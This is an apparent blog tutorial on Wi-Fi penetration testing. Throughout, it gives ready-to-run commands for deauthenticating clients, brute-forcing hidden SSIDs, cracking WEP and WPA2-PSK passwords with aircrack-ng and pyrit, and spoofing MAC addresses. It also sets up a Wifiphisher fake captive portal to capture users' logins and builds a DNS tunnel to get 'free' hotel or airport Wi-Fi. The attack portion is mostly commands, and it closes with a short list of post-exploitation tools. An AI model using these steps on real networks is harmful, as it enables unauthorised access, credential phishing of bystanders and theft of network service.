Wi-Fi is a wireless networking technology that allows devices such as computers (laptops and desktops), mobile devices (smart phones and wearables), and other equipment (printers and video cameras) to interface with the Internet. It allows these devices–and many more–to exchange information with one another, creating a network.
As soon as a technologies came to wireless implementation, it provided a new wide attack surface, brand new way to compromise your private network or even intranet. A variety of techniques like cracking weak encryption, MAC/IP spoofing, DNS poisoning, piggybacking, wardriving, rouge access points, fake captive portals, MiTM and many more, all of these a the most popular attack threads to compromise a network last decade.
Today, I would list a few simple and common attack vectors exists in wireless network. To find more information, please follow our previous review of the most common attack vectors.
First, let’s list a basic command and tools. I am using Kali Purple edition virtual machine, where all of the tools I will leverage in the review, are available out-the-box. To interact with WiFi networks I will need wireless adapter. I use cheap 14$ TP-Link Archer T3U adapter on RTL88x2BU chipset.
WiFi penetration testing: basic attack technique
Before we start!
Check interface mode and status:
$ iwconfig $INTERFACE_NAME
$ ifconfig $INTERFACE_NAME
Set monitor mode with airmon-ng suite:
$ airmon-ng check kill
$ ifconfig $INTERFACE_NAME down
$ iwconfig $INTERFACE_NAME mode monitor
$ ifconfig $INTERFACE_NAME up
List networks:
$ airodump-ng $INTERFACE_NAME -c $CHANNEL -e $ESSID
Deauthentication:
# Only one client
$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $INTERFACE_NAME
# All the clients in the AP
$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $INTERFACE_NAME
How to get hidden SSID with clients. List the networks using airodump-ng
and get the AP’s MAC address ($AP_MAC)
and one from a
client ($CLIENT_MAC)
. Then In another terminal, deauthenticate a client or all of them. When airodump-ng
captures a
handshake from this network, the name or ESSID will appear in the first terminal
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $INTERFACE_NAME
Getting hidden SSID without clients. List the networks using airodump-ng
and get the AP’s MAC address ($AP_MAC)
and one from a
client ($CLIENT_MAC)
. Then use mdk3 to brute force. Do not stop the capture:
# Execute a dictionary attack
$ mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
# Bruteforce attack
$ mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
Open networks
Public Wi-Fi networks, or hotspots, in coffee shops, malls, airports, hotels, and other places are convenient. Most of the time, they do not use enhanced security configuration or not secure at all.
Fake captive portals
- Clone any website using tool like HTTrack
- Install Wifiphiser. Add the HTTrack result in a new folder in
wifiphisher/data/phishingpages/new_page/html
and a configuration file inwifiphisher/data/phishingpages/new_page/config.ini
. - Recompile the project using python
setup.py
install or the binary in bin. - This command may need installing hostapd
- Now you ready to deauth any client and wait for someone login into and leave his credentials.
Bypassing open network authentication with MAC spoofing
The method to bypass a captive portal is to change your MAC address to one of an already authenticated user. First, we need to scan the network and get the list of IP and MAC addresses. You can use nmap host discovery only:
$ nmap 192.168.1.1/24 -sn
Change your IP and MAC addresses using macchanger:
$ macchanger
Bypassing open network authentication with DNS tunneling
The second method is creating a DNS tunnel. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get “free” Wifi in hotel, airports.
Check the domain names are resolved:
$ nslookup example.com
Create two DNS records using any free registrar like GoDaddy or BlueHost.
One “A record”: dns.$DOMAIN
pointing to the $SERVER_IP
(Example: dns.domain.com, 139.59.172.117)
One “NS record”: hack.$DOMAIN
pointing to dns.$DOMAIN
(Example: hack.domain.com, dns.domain.com)
Use iodine:
# On server
$ iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
# On client
$ iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
Create the tunnel:
$ ssh -D 8080 $USER@10.0.0.1
WEP and WPA cracking
WEP IV pass cracking
Wired Equivalent Privacy (WEP) is one the most weak wireless standard nowadays. The easiest way to crack inside it is airodump-ng
.
Start capture:
$ airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $INTERFACE_NAME
Accelerate the IV capture using Fake authentication + Arp Request Replay Attack + Deauthenticate user. Stop Airodump at ~100.000 different IVs:
$ aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $INTERFACE_NAME
$ aireplay-ng -3 -b $AP_MAC -h $MY_MAC $INTERFACE_NAME
$ aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $INTERFACE_NAME
Use aircrack-ng
to get a password:
$ aircrack-ng $PCAP_FILE
WPA2-PSK cracking
Start capture:
$ airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $INTERFACE_NAME
Deauthenticate an user. Stop airodump capture when you see a message ‘WPA handshake: $MAC
‘:
$ aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $INTERFACE_NAME
Crack the handshake using aircrack-ng
:
$ aircrack-ng -w $WORDLIST capture.cap
OR using Pyrit:
$ pyrit -r $PCAP_FILE analyze
$ pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
$ pyrit -i $WORDLIST import_passwords
$ pyrit eval
$ pyrit batch
$ pyrit -r $CLEAN_PCAP_FILE attack_db
Post exploitation technique
Once you are connected to the network, you may a router:
- Routersploit is exploitation Framework for Embedded Devices – Test “use scanners/autopwn”
- Nmap/Zenmap. Security Scanner, Port Scanner, & Network Exploration Tool
- Masscan. The faster version of nmap (it can break things, so be careful)
- Netdiscover. ARP sniffing. Very useful if the networks are very well segmented
- Ettercap. Check if you can do a MitM attack and sniff all the traffic in the network
Hope you like it!
Please follow me on Twitter and subscribe to our newsletter to be in touch.
Save your privacy, be ethical!